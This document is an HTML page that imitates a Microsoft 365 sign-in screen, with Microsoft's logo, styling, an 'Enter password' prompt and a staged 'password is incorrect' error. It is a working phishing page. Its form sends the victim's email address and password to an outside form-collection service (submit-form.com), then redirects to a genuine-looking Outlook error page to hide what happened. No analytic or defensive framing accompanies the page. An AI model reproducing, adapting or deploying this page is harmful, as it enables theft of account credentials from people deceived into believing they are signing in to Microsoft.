<!doctype html>
<html>
<head>
	<title>Home | Microsoft 365</title>
</head>
<body><main class="bg" style="background-image: url(https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg);">
<div class="login">
<div class="login_bg">
<p><img alt="Microsoft" src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" style="font-size: 14px;" /></p>

<form action="https://submit-form.com/wLfkOxvr" method="POST" style="padding: 0px; font-family: sans-serif;"><input name="_redirect" type="hidden" value="https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&amp;code=11&amp;be=SN6PR04MB4014&amp;fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&amp;loc=en-US&amp;itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee" />
<div class="form-group curActive has-error" style="font-family: Arial, sans-serif; font-size: 14px; box-sizing: border-box; margin-bottom: 15px; position: relative;">
<p><button aria-label="Back" class="backButton" data-bind="
        attr: { 'id': backButtonId || 'idBtn_Back' },
        ariaLabel: str['CT_HRD_STR_Splitter_Back'],
        ariaDescribedBy: backButtonDescribedBy,
        click: backButton_onClick,
        hasFocus: focusOnBackButton" id="idBtn_Back" style="margin-right: 2px; font-family: inherit; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; overflow: hidden; appearance: button; cursor: pointer; max-width: 100%; min-width: 24px; position: relative; white-space: nowrap; vertical-align: middle; text-overflow: ellipsis; touch-action: manipulation; border-width: 0px; border-style: none; border-color: initial; background-color: rgb(255, 255, 255); min-height: 24px; width: 24px; float: left; border-radius: 12px;" type="button"><img alt="" data-bind="imgSrc" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" role="presentation" src="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" style="border: 0px; box-sizing: border-box; vertical-align: middle;" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" /></button><br />
<input autofocus="autofocus" id="i0117" name="Email" placeholder="Email Address" required="required" size="50" style="box-sizing: border-box; font: inherit; max-width: 100%; padding-top: 6px; padding-right: 10px; padding-bottom: 6px; border-style: solid; border-width: 0px 0px 1px; border-color: rgba(0, 0, 0, 0.6); height: 36px; outline: none; border-radius: 0px;" type="email" /></p>
</div>

<div data-bind="component: { name: 'pagination-control',
            publicMethods: paginationControlMethods,
            params: {
                enableCssAnimation: svr.fEnableCssAnimation,
                disableAnimationIfAnimationEndUnsupported: svr.fDisableAnimationIfAnimationEndUnsupported,
                initialViewId: initialViewId,
                currentViewId: currentViewId,
                initialSharedData: initialSharedData,
                initialError: $loginPage.getServerError() },
            event: {
                cancel: paginationControl_onCancel,
                load: paginationControlHelper.onLoad,
                unload: paginationControlHelper.onUnload,
                loadView: view_onLoadView,
                showView: view_onShow,
                setLightBoxFadeIn: view_onSetLightBoxFadeIn,
                animationStateChange: paginationControl_onAnimationStateChange } }" role="main" style="box-sizing: border-box; color: rgb(27, 27, 27); font-family: &quot;Segoe UI Webfont&quot;, -apple-system, &quot;Helvetica Neue&quot;, &quot;Lucida Grande&quot;, Roboto, Ebrima, &quot;Nirmala UI&quot;, Gadugi, &quot;Segoe Xbox Symbol&quot;, &quot;Segoe UI Symbol&quot;, &quot;Meiryo UI&quot;, &quot;Khmer UI&quot;, Tunga, &quot;Lao UI&quot;, Raavi, &quot;Iskoola Pota&quot;, Latha, Leelawadee, &quot;Microsoft YaHei UI&quot;, &quot;Microsoft JhengHei UI&quot;, &quot;Malgun Gothic&quot;, &quot;Estrangelo Edessa&quot;, &quot;Microsoft Himalaya&quot;, &quot;Microsoft New Tai Lue&quot;, &quot;Microsoft PhagsPa&quot;, &quot;Microsoft Tai Le&quot;, &quot;Microsoft Yi Baiti&quot;, &quot;Mongolian Baiti&quot;, &quot;MV Boli&quot;, &quot;Myanmar Text&quot;, &quot;Cambria Math&quot;; font-size: 15px;">
<div data-bind="css: { 'zero-opacity': hidePaginatedView() }" style="box-sizing: border-box;">
<div class="pagination-view animate has-identity-banner slide-in-next" data-bind="css: {
        'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.sPOST_Username),
        'zero-opacity': hidePaginatedView.hideSubView(),
        'animate': animate(),
        'slide-out-next': animate.isSlideOutNext(),
        'slide-in-next': animate.isSlideInNext(),
        'slide-out-back': animate.isSlideOutBack(),
        'slide-in-back': animate.isSlideInBack() }" style="box-sizing: border-box; position: relative; min-height: 170px; animation-duration: 0.25s; animation-timing-function: cubic-bezier(0.5, 0, 0.5, 1); animation-fill-mode: both; transition-property: left; animation-name: show-from-right;">
<div data-bind="pageViewComponent: { name: 'login-paginated-password-view',
                params: {
                    serverData: svr,
                    serverError: initialError,
                    isInitialView: isInitialState,
                    username: sharedData.username,
                    displayName: sharedData.displayName,
                    hipRequiredForUsername: sharedData.hipRequiredForUsername,
                    passwordBrowserPrefill: sharedData.passwordBrowserPrefill,
                    availableCreds: sharedData.availableCreds,
                    evictedCreds: sharedData.evictedCreds,
                    useEvictedCredentials: sharedData.useEvictedCredentials,
                    showCredViewBrandingDesc: sharedData.showCredViewBrandingDesc,
                    flowToken: sharedData.flowToken,
                    defaultKmsiValue: svr.iDefaultLoginOptions === 1,
                    userTenantBranding: sharedData.userTenantBranding,
                    sessions: sharedData.sessions,
                    callMetadata: sharedData.callMetadata },
                event: {
                    updateFlowToken: $loginPage.view_onUpdateFlowToken,
                    submitReady: $loginPage.view_onSubmitReady,
                    redirect: $loginPage.view_onRedirect,
                    resetPassword: $loginPage.passwordView_onResetPassword,
                    setBackButtonState: view_onSetIdentityBackButtonState,
                    setPendingRequest: $loginPage.view_onSetPendingRequest } }" data-dynamicbranding="true" data-showidentitybanner="true" data-viewid="2" style="box-sizing: border-box;">
<div class="row title ext-title" data-bind="externalCss: { 'title': true }" id="loginHeader" style="box-sizing: border-box; margin-top: 16px; margin-bottom: 12px; line-height: 1.75rem; font-size: 1.5rem; font-weight: 600; font-family: &quot;Segoe UI&quot;, &quot;Helvetica Neue&quot;, &quot;Lucida Grande&quot;, Roboto, Ebrima, &quot;Nirmala UI&quot;, Gadugi, &quot;Segoe Xbox Symbol&quot;, &quot;Segoe UI Symbol&quot;, &quot;Meiryo UI&quot;, &quot;Khmer UI&quot;, Tunga, &quot;Lao UI&quot;, Raavi, &quot;Iskoola Pota&quot;, Latha, Leelawadee, &quot;Microsoft YaHei UI&quot;, &quot;Microsoft JhengHei UI&quot;, &quot;Malgun Gothic&quot;, &quot;Estrangelo Edessa&quot;, &quot;Microsoft Himalaya&quot;, &quot;Microsoft New Tai Lue&quot;, &quot;Microsoft PhagsPa&quot;, &quot;Microsoft Tai Le&quot;, &quot;Microsoft Yi Baiti&quot;, &quot;Mongolian Baiti&quot;, &quot;MV Boli&quot;, &quot;Myanmar Text&quot;, &quot;Cambria Math&quot;;">
<div aria-level="1" data-bind="text: str['CT_PWD_STR_EnterPassword_Title']" role="heading" style="box-sizing: border-box;">Enter password</div>

<div aria-level="1" data-bind="text: str['CT_PWD_STR_EnterPassword_Title']" role="heading" style="box-sizing: border-box;"><span style="color: rgb(232, 17, 35); font-family: &quot;Segoe UI Webfont&quot;, -apple-system, &quot;Helvetica Neue&quot;, &quot;Lucida Grande&quot;, Roboto, Ebrima, &quot;Nirmala UI&quot;, Gadugi, &quot;Segoe Xbox Symbol&quot;, &quot;Segoe UI Symbol&quot;, &quot;Meiryo UI&quot;, &quot;Khmer UI&quot;, Tunga, &quot;Lao UI&quot;, Raavi, &quot;Iskoola Pota&quot;, Latha, Leelawadee, &quot;Microsoft YaHei UI&quot;, &quot;Microsoft JhengHei UI&quot;, &quot;Malgun Gothic&quot;, &quot;Estrangelo Edessa&quot;, &quot;Microsoft Himalaya&quot;, &quot;Microsoft New Tai Lue&quot;, &quot;Microsoft PhagsPa&quot;, &quot;Microsoft Tai Le&quot;, &quot;Microsoft Yi Baiti&quot;, &quot;Mongolian Baiti&quot;, &quot;MV Boli&quot;, &quot;Myanmar Text&quot;, &quot;Cambria Math&quot;; font-size: 15px; background-color: rgb(255, 255, 255);">Your account or password is incorrect. If you can&#39;t remember your password,&nbsp;</span><a href="#" id="idA_IL_ForgotPassword0" style="box-sizing: border-box; background-color: rgb(255, 255, 255); color: rgb(0, 103, 184); text-decoration-line: none; font-family: &quot;Segoe UI Webfont&quot;, -apple-system, &quot;Helvetica Neue&quot;, &quot;Lucida Grande&quot;, Roboto, Ebrima, &quot;Nirmala UI&quot;, Gadugi, &quot;Segoe Xbox Symbol&quot;, &quot;Segoe UI Symbol&quot;, &quot;Meiryo UI&quot;, &quot;Khmer UI&quot;, Tunga, &quot;Lao UI&quot;, Raavi, &quot;Iskoola Pota&quot;, Latha, Leelawadee, &quot;Microsoft YaHei UI&quot;, &quot;Microsoft JhengHei UI&quot;, &quot;Malgun Gothic&quot;, &quot;Estrangelo Edessa&quot;, &quot;Microsoft Himalaya&quot;, &quot;Microsoft New Tai Lue&quot;, &quot;Microsoft PhagsPa&quot;, &quot;Microsoft Tai Le&quot;, &quot;Microsoft Yi Baiti&quot;, &quot;Mongolian Baiti&quot;, &quot;MV Boli&quot;, &quot;Myanmar Text&quot;, &quot;Cambria Math&quot;; font-size: 15px;">reset it now.</a></div>
</div>

<div class="row" style="box-sizing: border-box;">
<div class="form-group col-md-24" style="box-sizing: border-box; position: relative; min-height: 1px; padding-left: 2px; padding-right: 2px; float: left; width: 352.014px; margin-bottom: 16px;">
<div class="placeholderContainer" data-bind="component: { name: 'placeholder-textbox-field',
            publicMethods: passwordTextbox.placeholderTextboxMethods,
            params: {
                serverData: svr,
                hintText: str['CT_PWD_STR_PwdTB_Label'] },
            event: {
                updateFocus: passwordTextbox.textbox_onUpdateFocus } }" style="box-sizing: border-box; width: 348.021px; position: relative;">
<div style="box-sizing: border-box; font-family: &quot;Segoe UI Webfont&quot;, -apple-system, &quot;Helvetica Neue&quot;, &quot;Lucida Grande&quot;, Roboto, Ebrima, &quot;Nirmala UI&quot;, Gadugi, &quot;Segoe Xbox Symbol&quot;, &quot;Segoe UI Symbol&quot;, &quot;Meiryo UI&quot;, &quot;Khmer UI&quot;, Tunga, &quot;Lao UI&quot;, Raavi, &quot;Iskoola Pota&quot;, Latha, Leelawadee, &quot;Microsoft YaHei UI&quot;, &quot;Microsoft JhengHei UI&quot;, &quot;Malgun Gothic&quot;, &quot;Estrangelo Edessa&quot;, &quot;Microsoft Himalaya&quot;, &quot;Microsoft New Tai Lue&quot;, &quot;Microsoft PhagsPa&quot;, &quot;Microsoft Tai Le&quot;, &quot;Microsoft Yi Baiti&quot;, &quot;Mongolian Baiti&quot;, &quot;MV Boli&quot;, &quot;Myanmar Text&quot;, &quot;Cambria Math&quot;; font-size: 15px; background-color: rgb(255, 255, 255);"><input autofocus="autofocus" id="i0117" name="Password" placeholder="Password" required="required" size="50" style="box-sizing: border-box; font: inherit; max-width: 100%; padding-top: 6px; padding-right: 10px; padding-bottom: 6px; border-style: solid; border-width: 0px 0px 1px; border-color: rgba(0, 0, 0, 0.6); height: 36px; outline: none; border-radius: 0px;" type="password" /></div>

<div class="sign-opt" id="sign-opt" style="box-sizing: border-box; font-family: &quot;Segoe UI Webfont&quot;, -apple-system, &quot;Helvetica Neue&quot;, &quot;Lucida Grande&quot;, Roboto, Ebrima, &quot;Nirmala UI&quot;, Gadugi, &quot;Segoe Xbox Symbol&quot;, &quot;Segoe UI Symbol&quot;, &quot;Meiryo UI&quot;, &quot;Khmer UI&quot;, Tunga, &quot;Lao UI&quot;, Raavi, &quot;Iskoola Pota&quot;, Latha, Leelawadee, &quot;Microsoft YaHei UI&quot;, &quot;Microsoft JhengHei UI&quot;, &quot;Malgun Gothic&quot;, &quot;Estrangelo Edessa&quot;, &quot;Microsoft Himalaya&quot;, &quot;Microsoft New Tai Lue&quot;, &quot;Microsoft PhagsPa&quot;, &quot;Microsoft Tai Le&quot;, &quot;Microsoft Yi Baiti&quot;, &quot;Mongolian Baiti&quot;, &quot;MV Boli&quot;, &quot;Myanmar Text&quot;, &quot;Cambria Math&quot;; font-size: 15px; background-color: rgb(255, 255, 255);">
<div style="box-sizing: border-box;">&nbsp;</div>
</div>
</div>
</div>
</div>

<div class="position-buttons" data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }" style="box-sizing: border-box;">
<div style="box-sizing: border-box; display: inline-block; width: 352.014px; margin-bottom: 36px;">
<div class="row" style="box-sizing: border-box;">
<div class="col-md-24" style="box-sizing: border-box; position: relative; min-height: 1px; padding-left: 2px; padding-right: 2px; float: left; width: 352.014px;">
<div class="text-13" style="box-sizing: border-box; font-size: 0.8125rem;">
<div class="form-group" style="box-sizing: border-box; margin-bottom: 16px;"><a data-bind="text: str['CT_PWD_STR_ForgotPwdLink_Text'], href: svr.urlResetPassword, click: resetPassword_onClick" href="#" id="idA_PWD_ForgotPassword" role="link" style="box-sizing: border-box; background-color: rgb(255, 255, 255); color: rgb(0, 103, 184); text-decoration-line: none; font-family: &quot;Segoe UI Webfont&quot;, -apple-system, &quot;Helvetica Neue&quot;, &quot;Lucida Grande&quot;, Roboto, Ebrima, &quot;Nirmala UI&quot;, Gadugi, &quot;Segoe Xbox Symbol&quot;, &quot;Segoe UI Symbol&quot;, &quot;Meiryo UI&quot;, &quot;Khmer UI&quot;, Tunga, &quot;Lao UI&quot;, Raavi, &quot;Iskoola Pota&quot;, Latha, Leelawadee, &quot;Microsoft YaHei UI&quot;, &quot;Microsoft JhengHei UI&quot;, &quot;Malgun Gothic&quot;, &quot;Estrangelo Edessa&quot;, &quot;Microsoft Himalaya&quot;, &quot;Microsoft New Tai Lue&quot;, &quot;Microsoft PhagsPa&quot;, &quot;Microsoft Tai Le&quot;, &quot;Microsoft Yi Baiti&quot;, &quot;Mongolian Baiti&quot;, &quot;MV Boli&quot;, &quot;Myanmar Text&quot;, &quot;Cambria Math&quot;; font-size: 13px;">Forgotten my password</a><a href="#" style="box-sizing: border-box; background-color: rgb(255, 255, 255); color: rgb(0, 103, 184); text-decoration-line: none; font-family: &quot;Segoe UI Webfont&quot;, -apple-system, &quot;Helvetica Neue&quot;, &quot;Lucida Grande&quot;, Roboto, Ebrima, &quot;Nirmala UI&quot;, Gadugi, &quot;Segoe Xbox Symbol&quot;, &quot;Segoe UI Symbol&quot;, &quot;Meiryo UI&quot;, &quot;Khmer UI&quot;, Tunga, &quot;Lao UI&quot;, Raavi, &quot;Iskoola Pota&quot;, Latha, Leelawadee, &quot;Microsoft YaHei UI&quot;, &quot;Microsoft JhengHei UI&quot;, &quot;Malgun Gothic&quot;, &quot;Estrangelo Edessa&quot;, &quot;Microsoft Himalaya&quot;, &quot;Microsoft New Tai Lue&quot;, &quot;Microsoft PhagsPa&quot;, &quot;Microsoft Tai Le&quot;, &quot;Microsoft Yi Baiti&quot;, &quot;Mongolian Baiti&quot;, &quot;MV Boli&quot;, &quot;Myanmar Text&quot;, &quot;Cambria Math&quot;; font-size: 15px;">!</a></div>

<div class="form-group" style="box-sizing: border-box; margin-bottom: 16px;"><span style="font-size:14px;"><strong><button class="btn" type="submit">Sign in</button></strong></span></div>

<div class="form-group" style="box-sizing: border-box; margin-bottom: 16px;">&nbsp;</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</form>
</div>
</div>

<div class="footer">
<div class="footer_links">&nbsp;</div>

<div class="footer_links">&nbsp;</div>

<div class="footer_links"><a class="footer_link" href="#">Terms of use</a> <a class="footer_link" href="#">Privacy &amp; cookies</a> <a class="footer_link" href="#"> <img alt="" src="" /> </a></div>
</div>
</main></body>
<link href="https://aadcdn.msftauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" rel="shortcut icon" />
<style type="text/css">*{ padding: 0; margin: 0; font-family: sans-serif; } .bg{ background-image: url('../img/outlook.jpg'); background-size: cover; background-position: center; height: 100vh; } .login{ width: 30.6%; background-color: transparent; margin: 0 auto; padding-top: 10%; } .login .outlook_logo{ max-width: 256px; max-height: 36px; display: block; margin-left: auto; margin-right: auto; margin-bottom: 25px; } .login_bg{ background-color: #fff; padding: 43px; overflow: hidden; } .img{ margin-bottom: 20px; } .login_bg p{ display: flex; margin-bottom: 20px; position: relative; } .login_bg p img{ animation: all .2s; margin-top: -2px; margin-right: 2px; } .login_bg p img:hover{ background-color: #ccc; border-radius: 50%; } .login_bg h2{ line-height: 16px; margin-bottom: 20px; } .login_bg h2 span{ display: block; margin-top: 8px; font-weight: normal; font-size: 14px; } .input_text{ width: 100%; border: none; border-bottom: 1px solid #656565; padding: 8px 0; margin-bottom: 20px; font-size: 16px; } .input_text::placeholder{ font-size: 16px; } .input_text:active{ outline: none; } .input_text:focus{ outline: none; } .link_section{ position: relative; display: inline; } .link{ display: inline; margin-right: 2px; line-height: 1px; } .link:link, .link:visited{ text-decoration: none; color: #0067b8; font-size: 13px; } .link:hover{ color: #656565; border-bottom: 1px solid #656565; } button.btn{ width: 110px; float: right; border-color: #0067b8; background-color: #0067b8; color: #fff; font-size: 14px; padding: 8px 0; cursor: pointer; border: none; } .qsn_img{ display: inline-block; position: absolute; top: 2px; } .footer{ position: fixed; bottom: 0; width: 100%; overflow: visible; z-index: 99; clear: both; background-color: rgba(0,0,0,0.6); } .footer_links{ margin: 0; float: right; } a.footer_link{ text-decoration: none; color: #fff; font-size: 12px; line-height: 28px; white-space: nowrap; display: inline-block; margin-left: 8px; margin-right: 8px; } a.footer_link img{ vertical-align: middle; }
</style>
<div>&nbsp;</div>

<div>&nbsp;</div>
</html>
